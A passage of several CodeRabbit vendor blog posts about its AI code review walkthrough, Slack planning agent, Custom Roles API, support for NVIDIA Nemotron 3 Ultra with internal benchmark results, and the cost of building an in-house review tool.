consider which changes belonged together, which pieces depended on others, and what order made the diff easiest to understand. CodeRabbit Review changes that experience. Instead of presenting a pull request as a flat list of files, it reorganizes the diff into a guided, layer-by-layer walkthrough, known as cohorts. It identifies semantic relationships between changes, groups related code blocks into logical cohorts, and orders those cohorts by dependency. Each cohort includes range-specific summaries and diagrams if they make sense, so reviewers can follow the change in an explorable order that matches how the system fits together. That ordering reflects something specific, which is the conceptual sequence behind the change. Adding a new feature that requires a database change might mean starting with the schema, then the business logic that depends on it, then the call sites that invoke that logic, then the front end, then unit tests, and finally integration tests. That is often the order the author had to reason through the change. It is also the order a reviewer needs in order to understand it. *“We did not think of review complexity as a problem of lines added and lines deleted. The real question was: What meaningful change happened? If a block of code is deleted from one place and moved twenty lines down, GitHub may show it as twenty lines removed and twenty lines added: a 40-line diff. But for the reviewer, nothing meaningful changed. CodeRabbit Review is built to make that distinction visible.” \- **Priyanka Kukreja, Staff Product Manager*** GitHub does not understand the logic of the change. In the best case, when a PR author has carefully structured their commits, GitHub can expose that order and give reviewers a path to follow. But most pull requests are not organized that way. Reviewers are often left with a diff ordered by alphabetical order of the file names. That is how reviewers end up reading call sites before the schema they depend on, tests before the business logic they cover, or UI changes before the underlying API exists. They have to jump backward and forward through the diff to reconstruct the path they should have been given upfront. CodeRabbit Review removes that reconstruction step. Once the walkthrough is rendered, reviewers can search across block summaries by concept, not just by keyword. Semantic search helps them find the part of a 1,400-line PR they care about in seconds. And because the interface sits as a layer on top of GitHub and Gitlab, reviewers can still leave comments on specific code blocks, discuss summaries, and return to the exact lines in the diff at any point, without disrupting their workflow. ### New CodeRabbit Review features Since launch, we’ve continued to [improve CodeRabbit Review](https://www.coderabbit.ai/blog/code-search-peek-in-coderabbit-review) around the things that make code review easier, like staying in context, following the code across files, asking questions in the flow of review, and prioritizing what matters. Code Peek lets reviewers click any symbol in the diff to see its definition and usages inline without opening another tab or losing their place. Chat Agent lets reviewers ask specific questions about the change right where they’re already working. Severity labels help teams filter findings by Critical, Major, Minor, or Trivial, so when a PR needs to ship soon, reviewers can focus on the issues that matter most. Last but not least, we’ve brought this popular feature to [GitLab](https://docs.coderabbit.ai/changelog#coderabbit-review-for-gitlab), giving more engineers access to a more intuitive code review experience. ## Why delivering this is harder than it looks The layer-by-layer walkthrough is the visible surface. The hard part is deciding what those layers should be. CodeRabbit Review does not just summarize changed blocks in isolation. It identifies semantically cohesive code blocks, maps the relationships between them, clusters them into cohorts, and lays those cohorts out in the order that makes the change easiest to understand. What used to be a set of leaf nodes becomes a graph: This block introduces the schema, these blocks update the business logic, these call sites depend on that logic, these UI changes expose it, and these tests validate the behavior. That is the “extra sauce” behind the layering. The product is not simply asking a model to explain a diff. It is building a syntactic and semantic graph of the change, then rendering that graph in a way that matches how a reviewer needs to reason through the PR. Getting that graph right matters. That is why CodeRabbit errs on the side of accuracy. Cohorts are grouped only when the relationships are clear, and diagrams appear only when they make those relationships easier to understand. The goal is not to produce the most elaborate explanation possible. It is to produce the explanation an experienced engineer would give when walking another engineer through the change. ### The context engine underneath This is only possible because CodeRabbit Review builds on the same context engine that powers CodeRabbit’s reviews. For every PR, CodeRabbit clones the repository and builds a fresh understanding of how the change connects across files, functions, APIs, and dependencies. It brings in the surrounding engineering context: PR descriptions, linked issues from tools like Jira, Linear, repository knowledge, path-specific instructions, architecture standards, past PRs, and team-specific learnings. Signals from linters, SAST tools, and MCP-connected systems can also be pulled in when they are relevant to the change. But more context is not automatically better context. Too little, and the model fills gaps with assumptions. Too much, and the signal drowns. That balance is harder to strike now that MCP makes it easy to connect almost anything: tickets, logs, configs, past PRs, entire repositories. Most tools that tried to solve the context problem landed in one of two places by including anything that looks vaguely related, or including everything and letting the model sort it out. Both approaches degrade review quality. The first produces reviews full of tangents. The second produces expensive, rambling output that sounds thorough but lacks confidence. CodeRabbit’s approach is optimization. Context is deduplicated, compressed, ranked, and filtered before it reaches the model. Subtask-specific context is kept isolated so it does not pollute the main review thread. The final prompt goes through a deliberate selection pass based on what earlier agents found relevant. Then a verification layer checks suggested comments against the code, the team’s guidelines, and the repository configuration before they reach the PR. ### Why the walkthrough feels simple That pipeline is what makes the cohorts and layered walk-through trustworthy. The cohort summaries are high-quality because they are grounded in accurate and relevant context. The ordering is useful because the underlying graph understands how the changed blocks relate to one another. CodeRabbit Review looks simple because the hard work has already happened underneath. It turns a pull request from a pile of changed lines into a structured map of what changed, why it matters, and how a reviewer should move through it. You cannot build the top layer without the one underneath it. ## Where CodeRabbit leads Making code changes easier to review is a problem many tools are trying to solve. Some, such as [SemanticDiff](https://semanticdiff.com/) can make a raw GitHub diff easier to read by reducing line-level noise. But semantic diff is still a presentation layer. It makes the change easier to look at. CodeRabbit Review includes [semantic diff](https://www.coderabbit.ai/blog/introducing-semantic-diff), but goes further. It does not just make the diff easier to read but also easier to understand. It organizes the full PR into a dependency-ordered walkthrough that reflects how the change fits together. That requires more than recognizing that a block moved. It requires understanding which blocks belong together, which ones depend on others, and what order helps a reviewer make sense of the change. Other products are also adding context, but the type of context matters. Linear’s recently launched review experience, [Diff](https://linear.app/now/code-review-should-be-fast) for example, also ties each review back to the issue and project, so reviewers can see the product context behind the work: the associated issue, the broader project, customer feedback, priority, and related tasks. That helps reviewers understand why the work exists. CodeRabbit can draw from Linear and other issue trackers too, but it goes deeper by analyzing the code itself: how changed blocks relate across files, functions, APIs, dependencies, and team standards. That is where CodeRabbit leads. It connects product context, code context, and review context into one explainable walkthrough. That depth shows up in benchmark results. In [Martian’s evaluation](https://codereview.withmartian.com), CodeRabbit leads on F1 score and, more importantly for code review, recall, the measure of how many real issues a system catches. For teams comparing AI review tools or considering a DIY approach, that is the difference that matters. By adding the layering system on top of the context engine, CodeRabbit delivers something competitors cannot match: high-quality, explainable code reviews that save developers time and reduce cognitive load. ## Accelerating past DIY: Why enterprise-grade review requires a purpose-built solution like CodeRabbit With today’s models and tools, many teams can build a basic AI review bot quickly. An internal team can wrap an LLM around a diff, add a webhook, post comments on a PR, and call it a review system. That gets you to v1. It does not get you to consistent, high-quality reviews that scale across teams, repositories, and review standards. The hard part is not generating comments. The hard part is building a system that understands the change well enough to review it accurately, explain it clearly, and improve over time. ### The walkthrough is the top layer, not the product The cohort-by-cohort walkthrough is not a standalone UI feature. It is the top layer of the review system. To replicate it, a team would first need to replicate the quality of the review underneath it: code understanding, context selection, block-level summaries, dependency mapping, and verification. Those are the pieces that make the final walkthrough accurate enough to trust. Without that foundation, a layered walkthrough can become worse than a flat diff. It may look organized, but if the cohorts are wrong or the ordering does not match the logic of the change, reviewers end up spending more effort reconciling the explanation with the code. ### The hidden cost is bigger than the first build DIY also carries costs beyond the initial prototype. Teams have to maintain the system as models change, repositories grow, coding patterns evolve, and more developers start relying on it. They also need visibility into usage, quality, latency, cost, governance, and compliance. Without that visibility, leaders have a hard time knowing whether the investment is actually improving review quality or simply adding another internal tool to maintain. ### Quality requires an evaluation loop The quality problem compounds at every layer. High-quality review requires an evaluation loop: systematic testing of every model change, prompt change, and context strategy against recall, precision, latency, and cost. Without that loop, teams cannot tell whether v2 is better than v1. They are shipping changes to their review system blind. Most DIY projects never build this infrastructure. They ship a first version, assume it works, and never develop the feedback mechanism required to make it better. ### Enterprise-scale DIY solution is not a wrapper around an LLM [Salesforce Engineering’s work](https://engineering.salesforce.com/scaling-code-reviews-adapting-to-a-surge-in-ai-generated-code/) on Prizm, their home grown review tool, shows what building this kind of system looks like at enterprise scale. Before Prizm could work, Salesforce had to build the context engineering infrastructure underneath it. Deep semantic analysis on large PRs could take several minutes, which required asynchronous analysis pipelines to make the latency acceptable. The result was not a small wrapper around an LLM. It was a re-architecture of the review system. Salesforce also built feedback loops that monitor production defects and incidents, identify patterns that should have been caught earlier, and feed those learnings back into the system over time. Salesforce is one of the world’s most sophisticated engineering organizations. If that level of investment is required for them to get the baseline right and the first review system working, it is worth being direct about what it means for most engineering teams starting from zero. The question is whether Prizm can scale beyond a first working tool into a consistent, high-quality review gate for the entire engineering organization. That is where many DIY efforts struggle. We have seen customers invest millions into sophisticated internal review tools, only to run into scalability, quality, and maintenance challenges as adoption grows. They come to CodeRabbit because they need a battle-tested, enterprise-grade review layer that helps teams ship with confidence. ### CodeRabbit’s advantage is earned review by review CodeRabbit has run that loop across millions of pull requests and more than 15,000 engineering teams over three years. That accumulated signal is the moat: knowing which context matters for which kind of change, which prompt strategies improve recall without adding noise, and which verification patterns catch the edge cases. That advantage cannot be inherited, or recreated by adding a model to a webhook. It has to be earned review by review. ## Conclusion AI is making code cheaper to generate. The bottleneck is no longer output, it is trusted verification. CodeRabbit Review was built for that shift. It turns a pull request from a pile of changed lines into an explainable walkthrough: what changed, why it matters, how the pieces fit together, and where reviewers should focus. Early users are already feeling the difference. One reviewer wrote, “Really digging CodeRabbit Review so far. I love the ability to post the review to GitHub directly from CodeRabbit Review.” Another said, “This is great\! The way it structures things into layers makes it way more digestible to review, and the block summaries make it really nice to step through the code.” DIY can get a team to a first review bot. Semantic diff can make a file easier to read. Product context can explain why the work exists. But explainable review requires something deeper: code understanding, context selection, evaluation, dependency mapping, and a verification layer earned across millions of pull requests. In the agentic SDLC, code generation is becoming commoditized. Trusted verification is becoming the moat. The teams that stay competitive will not be the ones reinventing review infrastructure from scratch, they will be the ones that adopt a verification layer built for agentic development. CodeRabbit is that layer.

Plan with CodeRabbit Agent: Where great engineering work begins

Priyanka Kukreja — Mon, 08 Jun 2026 00:00:00 GMT

Every feature used to take the same trip: Slack thread, Zoom calls, design doc, a sister team flagging dependencies halfway through, and then an engineer manually stuffing all that context into a coding agent somewhere else entirely. ![CodeRabbit app planning request for updating docs on Agent for Slack's /plan feature.](https://victorious-bubble-f69a016683.media.strapiapp.com/Prompt_67c55b4e34.png) [Plan in CodeRabbit Agent for Slack](https://www.coderabbit.ai/plan) short-circuits that workflow. Idea, plan, implementation all stay in the same Slack thread where the conversation started. Whether you type /plan in any Slack thread, click "Plan this work" when [CodeRabbit Agent for Slack](https://www.coderabbit.ai/agent) suggests it, or trigger it from a message action, an ambiguous engineering request becomes a structured, codebase-aware implementation plan without ever leaving the conversation where the idea was raised. ## What Plan does %[https://youtu.be/PIFlexrrUKY] Plan is a workflow that sits between intent and code. It makes the process of going from "we want to do this" and "here are the code changes" lighting fast. It looks at three things together: 1. The request itself 2. The Slack thread context around it 3. The connected repository context that Agent already understands Then it produces a plan grounded in your actual codebase. The workflow is deliberately structured to run in two steps: **Step 1: The scoped brief.** A fast, lightweight pass that names the likely repos and modules, the major workstreams, the risks and unknowns, the validation surface, and a concise recommendation for how to proceed. It's something you can react to in seconds. The goal here is to steer the agent by either redirecting or accepting. ![A technical document detailing tasks for a Black Agent system integration and update.](https://victorious-bubble-f69a016683.media.strapiapp.com/Plan_971328f25b.png) **Step 2: The detailed plan.** Once a scoped brief is created, the Agent gives you a choice to create detailed plan. Here the Agent expands the brief into a full implementation plan: repository scope, assumptions, phased work, specific tasks per phase, cross-repo coordination, non-goals, and a summary of the approach. The plan posts back into the Slack thread, and where necessary, is also saved as a Slack Canvas. This canvas is a durable artifact you and your team can refine, collaborate, share, and reference in conversations. When the plan is ready to execute, Agent gives you an option to Implement this plan which then hands it off to Agent to actually build. %[https://youtu.be/AlGYJ-Mqe-Q] ## Why This Matters Having CodeRabbit Agent for Slack create a Plan for you before the actual code changes prevents rework. Multi-file features, schema migrations, API contract changes, and refactors where order of operations matters are often the changes where things can go sideways. This often happens because nobody mapped the “work surface” before someone started writing code for it. Planning is the cheap, fast, shared-thinking step that catches those problems while they're still words in a thread instead of merge conflicts in a PR. A few concrete wins: * **From plan to PR in one click.** When the plan looks right, hit "Implement this plan" and CodeRabbit goes from approved plan to an open pull request without ever leaving the Slack thread. * **Scope clarity, faster.** The scoped brief gives you a codebase-aware first read within minutes. This is much faster than a 30-minute meeting followed by a design doc to align the team. * **Shared context, not tribal knowledge.** The Plan lives in the Slack thread where the conversation is happening. Your PM, your tech lead, and the engineer picking up the work all see the same canvas artifact. * **Codebase-grounded, not generic.** Because CodeRabbit already understands your repositories, the plan references real services and modules. This is not the hypothetical advice you'd get from a chat assistant working blind. * **Built for team collaboration in Slack Canvas.** The plan canvas is a living document your team can shape together, right where the conversation is happening. Huddle on it, leave feedback for each other, edit in place, and assign owner, editor, or commenter roles. Version history shows who changed what and when. Threaded replies keep discussion attached to the line it's about. ## How It's different A generic LLM chat tool with access to your codebase can produce something that looks like a plan, but at best it's guessing. At worst, it's misleading you away from ground reality in the code. It doesn't know that your billing service is the source of truth for how customer subscription plans work, not the identity service. It also doesn't have real-world context like the mobile clients being out of scope this quarter. A generic plan reads well but falls apart when it meets the actual feature build-out. CodeRabbit's planning is grounded in the repositories you've already connected, plus the Slack conversation you've had with the team. It knows the modules, the dependency graph, and the patterns your team actually uses, along with the [conversational context in Slack](https://www.coderabbit.ai/blog/coderabbit-agent-for-slack-workflows). Two differences worth calling out: 1. Planning happens where the work is discussed. Most planning tools require a context switch: open a doc, open a ticket, open a separate AI tab, paste the prompt, copy the output back. Planning in the CodeRabbit Agent for Slack runs in the thread, and the conversation that produced the idea is the conversation that produces the plan. 2. CodeRabbit doesn't silently turn every thread into a planning session. The "Planning could help here" suggestion only appears when the task looks large or ambiguous enough that planning would actually reduce risk. For small bug fixes, one-file changes, and routine questions, it stays out of the way and lets you jump straight to implementation. ## How planning fits the Agentic SDLC This release is part of a larger arc as we are building towards a software development lifecycle where AI agents are genuine collaborators across every phase, not just at code review. The CodeRabbit Agent for Slack already does code review, answers questions about your codebase, and can implement changes. Planning is the missing front of the lifecycle, and is the strategy step that makes everything downstream more reliable. When a plan is good, implementation is faster, review is sharper, and rollout is safer. When planning is absent, every later stage has to absorb the ambiguity. Here's how the pieces connect: 1. **Plan**: Turn an ambiguous request into a structured, codebase-aware approach (this release). 2. **Implement**: Hand the plan to CodeRabbit Agent for Slack to build, with the same context already loaded. 3. **Review**: CodeRabbit reviews the resulting changes against the plan and the codebase. 4. **Iterate**: The Slack thread stays as the durable record of why decisions were made. We believe that the [best agentic SDLC](https://www.coderabbit.ai/blog/agentic-sdlc-workflow) isn't a tool that replaces engineers, it’s a platform that empowers builders by compressing the time between intent and code keeping humans in control at every decision point. ## Get started If your team uses the CodeRabbit Agent for Slack, planning is available now. In any thread, try: ``` /plan \ ``` The better your prompt, the better the plan. Include product behavior, expected scope, constraints, what's out of scope. But even a one-line request gets you a scoped brief you can refine in the thread.

Automate role management in CodeRabbit with the new Custom Roles API

Henry Lau — Fri, 05 Jun 2026 00:00:00 GMT

Until now, every custom role in CodeRabbit lived in the dashboard. An admin opened the Permissions page, built a role, set its read and write permissions, and assigned it to each user by hand. That's fine when you're onboarding a few people. It doesn't scale when you're a large organization with engineers joining, switching teams, and leaving every week. Today we're introducing the [Custom Roles API for Enterprise](https://docs.coderabbit.ai/api-reference/roles-create) which are REST endpoints that let you create, configure, and assign custom roles programmatically. Everything you can do on the Permissions page can now be automated, so access scales with your headcount and you can get the most out of every CodeRabbit subscription. ## What you can automate with Custom Role APIs **Standardize every new user.** Set a role as the default with `is_default`, and every new member starts with the right baseline access automatically. **Manage roles as code.** Define your org's roles in version control and create them through the API. Use `duplicate_from` to base a new role like *Security Reviewer* on an existing one (`cr_member` by default), then adjust only the permissions that differ. **Sync roles with your identity system.** Connect the API to an HRIS like Rippling so the right role is granted the moment someone joins and revoked the moment they leave. ![Web application displaying 'Roles and Permissions' page with a table of user roles.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_87ea9bfd18.png) Creating a new custom role takes a single call: ``` POST https://api.coderabbit.ai/v1/roles x-coderabbitai-api-key: { "name": "Security Reviewer", "duplicate_from": "cr_member", "permissions": [ { "resource_id": "user_management", "access_type": "read" } ] } ``` Other new API endpoints include: * GET /v1/roles * GET /v1/roles/permissions * POST /v1/roles * GET /v1/roles/{role\_id} * PATCH /v1/roles/{role\_id} * DELETE /v1/roles/{role\_id} ## Try it out The Custom Roles API turns access management from a click-by-click chore into something your systems handle on their own, provisioned consistently, updated instantly, and easy to govern as your team grows. It's available now for Enterprise customers. Generate an API key with Admin permissions from your CodeRabbit dashboard, and wire role management into the workflows you already run. **Learn more:** [Create a custom role API reference](https://docs.coderabbit.ai/api-reference/roles-create)

CodeRabbit now supports NVIDIA Nemotron 3 Ultra

Sahil Mohan Bansal — Thu, 04 Jun 2026 00:00:00 GMT

*TL;DR: NVIDIA Nemotron 3 Ultra delivers accurate and fast throughput in CodeRabbit's self-hosted AI code reviews*. We are excited to share that CodeRabbit is expanding its support for the NVIDIA Nemotron family of open models, expanding to include Nemotron 3 Super and [**Nemotron 3 Ultra**](https://blogs.nvidia.com/blog/nvidia-gtc-taipei-computex-2026-news/#nemotron-3-ultra) for AI code review workflows. Nemotron 3 Super helps with context gathering and summarization whereas Nemotron 3 Ultra helps generate code review comments for many reviews outside of the most complex tiers. This expanded support is available for CodeRabbit's self-hosted customers running its container image on their own infrastructure. Initial eval results indicate that **Nemotron 3 Ultra** aligns with our current frontier model ensemble for junior-tier engineering assessments, with similar token efficiency while achieving approximately 2x faster response times. OpenAI and Anthropic models remain the primary engines for producing most of the review comments delivered to your Pull Requests. ### Expanding to Super and Ultra: Faster context gathering and lower latency Previously we had announced our [support of Nemotron 3 Nano and Super](https://www.coderabbit.ai/blog/faster-code-reviews-with-nemotron-3-super), where we reported that a blend of open and frontier models allows us to improve the overall speed of context gathering and PR summarization. This blend of open and frontier models is also more cost efficient by routing different parts of the review workflow to the appropriate model family \- PR Summarization with Nemotron and review comments with frontier LLMs. As with the rest of the Nemotron family, NVIDIA is releasing Ultra as a truly open model, with the weights, training data, and training recipe published alongside it. That openness is part of why Nemotron has been a good fit for self-hosted teams that need to run reviews inside their own environment. With the support for Nemotron 3 Nano, Super and now Ultra, we can use Nemotron open models for context gathering, PR summarization, and some aspects of review comment generation. ![A detailed technical architecture diagram showcasing CodeRabbit's AI agents, context enrichment, and knowledge base components.](https://victorious-bubble-f69a016683.media.strapiapp.com/Code_Rabbit_Architecture_with_Nemotron_1_5146e1bc54.png) ### What Ultra unlocks beyond Nano and Super When you open a Pull Request (PR), CodeRabbit’s code review workflow is triggered starting with an isolated and secure sandbox environment where CodeRabbit analyzes code from a clone of the repo. In parallel, CodeRabbit pulls in context signals from several sources: - Code and PR index - Linter / Static App Security Tests (SAST) - Multi-repo code graph - Coding agent rules files - Custom review rules and Learnings - Issue details (Plan file, Jira, Linear, Github issues) - Public MCP servers - Web search A lot of this context, along with the code diff being analyzed, is used to generate a PR Summary before any review comments are generated. Summarization is at the heart of every code review and is the key to delivering high signal-to-noise in the review comments. We continue to support Nemotron 3 Nano and Super for the repetitive work of context processing during review summarization, which is critical for our code reviews. ![Code editor displaying JavaScript functions and variables, with a related forum discussion below it.](https://victorious-bubble-f69a016683.media.strapiapp.com/image_2bc619b54c.png) We compared Nemotron 3 Ultra against equivalent frontier models and our analysis found that at the junior reviewer tier Nemotron 3 Ultra: * Matched our frontier model blend on review quality measured by pass rate and precision * Produced a comparable volume of review comments at a comparable number of tokens per review * Ran with almost 50% less median latency making it 2x faster than using only frontier LLMs These results held for both trivial and junior-level review comments. These are early, encouraging results in a specific place: faster, lower-effort reviews where an efficient open model can carry more of the load. For customers this means faster PR summarization, context gathering and faster code reviews without compromising quality. We are also delighted to support the announcement from NVIDIA today about the expansion of its Nemotron family of open models and are excited to work with the company to help accelerate AI coding adoption across every industry. [Get in touch](https://www.coderabbit.ai/contact-us/sales) with the CodeRabbit team to access CodeRabbit’s container image if you would like to run AI code reviews on your self-hosted infrastructure.

Nemotron 3 Ultra makes the case for fast, open coding models

Juan Pablo Flores — Thu, 04 Jun 2026 00:00:00 GMT

NVIDIA Nemotron 3 Ultra does not feel like another model built primarily for a chat window. The first question is not whether it can win a leaderboard, but whether it can fit into the way developers actually use models now: inside terminals, review pipelines, coding agents, test generators, and workflows where the model has to keep moving through messy context. [NVIDIA](https://www.nvidia.com/en-us/) is releasing a large open model with roughly 550 billion total parameters and about 55 billion active per token, but the real pitch is speed plus control. If a model is fast enough, a developer can stay in the loop. A system can retry it. A coding harness can keep it working until the task is actually finished. Ultra is not the model I would frame as "the new best coding assistant." It points toward a world where open models become fast, controllable workers inside developer systems, not just chat interfaces waiting for the next prompt. For workflows where the model is one part of a larger loop, Nemotron 3 Ultra becomes especially relevant: code review, test generation, repository research, agentic coding, and internal automation where teams care about speed, control, and where the model runs. ![Scatter plot showing AI intelligence index versus output speed, with a most attractive quadrant highlighted.](https://victorious-bubble-f69a016683.media.strapiapp.com/image_1_89beaab96b.png) ## What we know about Nemotron 3 Ultra Nemotron 3 Ultra is the largest model in [NVIDIA's Nemotron 3 family](https://www.coderabbit.ai/blog/coderabbit-ai-code-reviews-now-support-nvidia-nemotron). The family includes Nano, Super, and Ultra, all designed around agentic AI applications. Ultra is the big reasoning engine in that lineup: roughly 550 billion total parameters, with about 55 billion active per token through a sparse mixture-of-experts design. The cleanest comparison is with [Nemotron 3 Super](https://www.coderabbit.ai/blog/faster-code-reviews-with-nemotron-3-super), the previous large model in the family. | Characteristic | Nemotron 3 Super | Nemotron 3 Ultra | | :---- | :---- | :---- | | Role in the family | High-throughput reasoning model for agentic workflows | Largest Nemotron 3 reasoning model for more complex coding, research, and enterprise workflows | | Total parameters | 120B | 550B | | Active parameters | 12B active per token | 55B active per token | | Architecture | Hybrid Mamba-Transformer MoE | Hybrid Mamba-Transformer MoE | | Expert design | Latent MoE | Latent MoE | | Context length | Up to 1M tokens | Up to 1M tokens | | Efficiency features | Multi-token prediction and NVFP4 training/deployment path | Multi-token prediction and NVFP4-oriented deployment path | | Best fit | High-volume agentic workflows, coding, planning, and tool use | More demanding developer workflows where speed, scale, and stronger reasoning need to sit in the same loop | In simpler terms: this is not just a bigger dense Transformer. Ultra is built to activate only part of the network per token, keep long context practical, and produce tokens quickly enough that developers can use it interactively instead of treating it like a slow background batch job. ![Flowchart detailing Nemotron 3 Ultra's fast architecture: long context, Mamba-Transformer, MoE routing, multi-token prediction.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_33ddb6cb02.png) The launch numbers put Ultra in a strong spot. [Artificial Analysis](https://artificialanalysis.ai/) reported Nemotron 3 Ultra at 48 on its Intelligence Index, making it the leading US open-weight model in that snapshot, ahead of Gemma 4 31B, Nemotron 3 Super, and gpt-oss-120b. Kimi K2.6 still sits higher at 54, so the claim is not that Ultra owns the entire open frontier. The claim is that it is unusually fast for the intelligence level it reaches. Artificial Analysis also reported more than 300 output tokens per second on a pre-release DeepInfra endpoint. For developers, that speed is the useful part. In coding, latency changes behavior. If a model is slow, you fire and forget. If it is fast, you stay in the loop, ask follow-ups, run multiple attempts, and let an agentic harness keep pushing. ![NVIDIA Nemotron 3 Ultra announcement slide showing a cost comparison graph presented by a speaker.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_b00e5036f7.png) ## What is different this time Nemotron 3 Super already showed that NVIDIA could build a capable open model for agentic workflows. Ultra pushes further in two ways. First, it is much bigger. Super is around 120B total parameters with roughly 12B active. Ultra moves to roughly 550B total and 55B active. That extra scale shows up in the way NVIDIA and early testers talk about it: not as a small efficient helper model, but as a model that can start taking work from proprietary frontier systems in selected workflows. Second, Ultra appears to have been trained and evaluated with developer harnesses more directly in mind. NVIDIA mentions that Super turned out to be good in agentic harnesses, while Ultra was built with those harnesses in mind. For coding tools, that changes the requirements. A model that works well in OpenCode, OpenHands, Kilo Code, Continue, or an [internal code review](https://www.coderabbit.ai/blog/your-internal-ai-code-review-tool-cost-more-than-you-think) loop has to do more than answer questions. It has to follow tool protocols, manage long context, make progress under repeated prompts, and recover when it gets stuck. Ultra's behavior fits that target. The model is quick, direct, not especially verbose, and unlikely to ask for lots of clarification. That can be a strength in a harness, but a weakness if the task depends on unstated requirements. It benefits from explicit instruction. The best mental model is closer to Codex-style prompting than Claude-style prompting. Spell out the task. Give acceptance criteria. State the expected output format. ## CodeRabbit Benchmark Performance CodeRabbit's internal benchmark gives a more grounded view than launch charts alone. The benchmark compares a baseline set of review models against a Nemotron 3 Ultra configuration across 105 evaluation problems, ranging from easier issues to harder review tasks. The evaluation uses post-pipeline final comments after verification, deduplication, and assertive filtering. The judge was gpt-5.1 with medium reasoning, low verbosity, single mode, and three votes. ![CodeRabbit benchmark table compares Baseline average and Nematron 3 Ultra performance metrics.](https://victorious-bubble-f69a016683.media.strapiapp.com/image4_ebd75f9572.png) The top-line result is close: * Baseline average, N=3: 60/105 pass actual, or 57 percent * Nemotron 3 Ultra average, N=2: 58/105 pass actual, or 56 percent * Baseline pass full: 66/105, or 63 percent * Nemotron 3 Ultra pass full: 65/105, or 62 percent * Baseline precision actual: 34.0 percent * Nemotron 3 Ultra precision actual: 33.0 percent The positive read: on this review workload, Ultra was roughly in the same band as the baseline on pass metrics. It found real issues, survived the review pipeline, and produced useful CodeRabbit-style comments. The caveat is reliability. The model had a high retry rate. The benchmark summary shows an average of 36.5 retries for the Ultra runs, compared with 0.3 for the baseline. The retry distribution notes that about 66 percent were scratchpad-only. In practice, the model sometimes voluntarily stops before producing the required output marker or final structured output. Retrying without changing the prompt often works, which suggests the capability is there, but the first-attempt completion behavior is not stable enough to ignore. The practical finding from the CodeRabbit data is clear: Nemotron 3 Ultra can do the work, but it should be wrapped in validation and retry logic for structured-output tasks. There is also an interesting latency signal. In the benchmark, the Ultra run shows a mean latency of 7:06 per full review trace, compared with 8:31 for the baseline. That is not an enormous difference in this specific report, but the Ultra runs were carrying a large retry burden and still remained competitive on time. NVIDIA's framing around Ultra repeatedly returns to the same idea: if the model is fast enough, several attempts can still beat one slower, more careful attempt. The cost story is less clean in the benchmark. The reported total cost for the Ultra run is higher than the baseline in this specific table. That should not be over-generalized, because internal fallback rates, hosted endpoint pricing, and retry behavior can dominate a local experiment. The public NVIDIA and Artificial Analysis story is about cost-to-completion and throughput. The [CodeRabbit](https://coderabbit.ai/) results say something narrower: on this benchmark, quality was close, speed was competitive, and the reliability control loop needs work. ## Where Ultra looks strong for developers The strongest use case for Nemotron 3 Ultra is not "replace every coding model." It is "run a lot of useful developer work quickly, with explicit instructions and external checks." It looks promising for: * Code review pipelines where comments can be verified, filtered, deduplicated, and retried * Integration test generation, especially when the model needs to read broad context * Repository research tasks that require scanning many files or documents * Agentic workflows where a harness can keep the model moving until the task is complete * Everyday coding tasks that benefit from fast iteration more than perfect one-shot reasoning NVIDIA also shared a useful example: Ultra was used in OpenCode to read several papers and reason across them. That is not a PhD-level coding challenge, but it is exactly the kind of everyday developer task where speed changes the workflow. You can stay in the terminal, watch the model move, and keep steering. For CodeRabbit-style work, the model also seems especially interesting on easier and medium-difficulty review tasks. These are still valuable reviews: the system needs to catch practical issues, explain them clearly, and produce a lot of review output without waiting on a more expensive frontier model every time. ## What developers should watch out for Ultra needs structure. If you are using it for coding or developer automation, do not treat it as a free-form chat model and hope it infers the workflow. Give it a harness. Give it a checklist. Give it stop conditions. Give it output validation. Practical guidance: * Use explicit prompts with concrete acceptance criteria. * For structured output, validate the required markers or schema before accepting the response. * Add retry logic for premature stops. * Use goal loops or external completion checks so the model keeps working until the task is actually done. * Ask for tests explicitly. In early hands-on use, the model did not always generate its own tests. * Be specific about design requirements. It can produce better visual artifacts than expected, but design is not its core strength. * Prefer it for high-throughput workflows where several attempts are acceptable. * Be cautious for workflows where a single malformed output can break production automation. This model also changes how teams should think about benchmarking. A pure one-shot benchmark may underrate Ultra if the real product loop allows retries. A benchmark that ignores retries may overrate it if the product needs strict first-attempt formatting. The right metric is probably closer to time-to-usable-completion, with quality, retries, latency, and cost all measured together. ## Verdict Nemotron 3 Ultra is one of the most interesting open model releases for developers because it is not only chasing intelligence. It is chasing usable throughput. The model is big, open, and fast. Public benchmarks put it near the top of US open-weight intelligence while keeping it far ahead of many peers on output speed. CodeRabbit's benchmark adds a more sober picture: Ultra can perform close to a strong review baseline, but it currently needs retries and external validation for structured-output reliability. The verdict is nuanced. If you want a model that will nail every strict format on the first try, Ultra is not yet the safest default. If you are building an agentic developer system where the harness can validate, retry, and keep pressure on the model until the work is complete, Ultra becomes much more compelling. For coding teams, the bigger story is not whether Nemotron 3 Ultra replaces a favorite chat model. It is whether open, high-throughput coding agents are starting to feel practical. Try it on [CodeRabbit PR reviews](https://app.coderabbit.ai/login???free-trial) now and let us know your thoughts.

Why your internal AI code review tool will cost more than you think

David Loker — Wed, 03 Jun 2026 00:00:00 GMT

When engineering teams start evaluating AI code review, the build option gets serious consideration fast, and having spent years building ML infrastructure at Netflix and Amazon, co-founding a generative AI company, and now serving as VP of AI at CodeRabbit, I understand why. The models are accessible, the APIs are straightforward, and with agentic coding tools like Claude and Codex now doing a meaningful share of the implementation work, a strong engineering team can get a working prototype out the door faster than ever before. The barrier to building has genuinely come down, and that's worth acknowledging honestly before making the case against it. But a working prototype isn't really what's being evaluated. What engineering teams are actually deciding is whether they can own this internal tool for two years. And that's where the math changes. What shows up in that first sprint is maybe ten percent of what it actually takes to run AI code review well over a longer period of time. From my own personal experience, and with speaking with customers who tried to build their own code review tool internally, the gap between a working demo and a solution your security team, your compliance team, and engineers across dozens of repositories can actually rely on is where the real cost lives. This piece works through what that investment looks like in practice, with a breakdown of the maintenance requirements that tend to get underestimated at the outset and cost comparisons across three company sizes, so that the decision is grounded in something more honest than a back-of-napkin estimate of what it takes to ship a prototype. ## The math that gets underestimated [Attio](https://attio.com/engineering/blog/building-better-software-with-ai) documented what it actually took to build and run their own AI code review tooling. Their experience is useful because they were honest about it: the early prototype was tractable, but the operational surface area kept growing. That pattern is consistent across the organizations we have spoken with. When you model the real cost of building internally, not just the initial build sprint but the maintenance team, model evaluation cycles, infrastructure, security reviews, and internal support, the numbers look very different from the back-of-envelope calculation that usually kicks off the project. Our cost 